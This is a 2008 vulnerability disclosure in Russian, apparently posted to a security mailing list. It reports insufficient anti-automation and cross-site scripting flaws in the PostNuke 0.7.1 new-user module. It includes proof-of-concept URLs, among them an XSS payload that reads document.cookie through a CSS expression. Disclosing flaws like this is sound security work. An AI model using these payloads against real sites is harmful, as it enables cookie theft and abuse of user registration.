Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

E-Mail header Injection in HiFriend

Vulnerability: SocialEngine (SocialEngine. net) high risk security flaw

[DSECRG-08-031] Local File Include Vulnerability in Interact 2.4.1

MyBlog <=0.9.8 Multiple Vulnerabilities

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	22.07.2008
Subject:	Vulnerabilities in PostNuke

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting
уязвимостях в PostNuke.

Insufficient Anti-automation:

Уязвимость в user.php (в модуле NS-NewUser).

http://site/user.php?uname=test&email=test@test.com&vemail=test@test.
com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уязвимости в user.php (в модуле NS-NewUser) в параметрах uname и email.

http://site/user.php?uname=%22%20style=%22xss:
expression(alert(document.cookie))&module=NS-
NewUser&op=confirmnewuser

http://site/user.php?email=%3Cxss%3E&vemail=&module=NS-
NewUser&op=confirmnewuser

Уязвима версия PostNuke 0.7.1 и предыдущие версии (и потенциально следующие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2277/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua